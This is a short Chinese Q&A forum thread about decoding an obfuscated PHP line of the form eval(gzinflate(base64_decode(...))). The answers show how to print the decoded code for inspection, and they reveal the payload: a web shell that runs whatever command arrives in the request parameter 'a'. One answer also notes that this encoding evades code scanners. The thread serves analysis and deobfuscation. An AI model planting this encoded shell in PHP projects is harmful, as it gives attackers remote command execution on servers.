PHP解密..不懂php,解密eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)))

如题所述

你可以编辑一个php文件,输入
<?php echo
gzinflate(base64_decode("40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=="));
?>
然后运行这个文件 php test.php 就能看到结果了。

这种方式是很弱的加密,但能避开很多代码检测工具。很多wordpress的插件和木马都采用这种模式。

wordpress常footer进行加密,因为里面包含作者的链接和申明,如果去掉这行代码,整个页面就不能正确显示。

木马可以通过这种隐秘的方式传入一段代码让php执行,像上面的例子,结果是 echo `$_REQUEST[a]`;; ?> 所以你在URL里传入 /?a=ls -al; 就会列出当前目录下所有文件。
温馨提示:答案为网友推荐,仅供参考
第1个回答  2013-09-18
一般这种文件都有一个最简单的解码方式
编码乱七八糟地字符串你不认识, eval命令同样不认识, 他最终给eval执行的肯定是正经的PHP代码,直接把eval命令中的参数打印出来就行了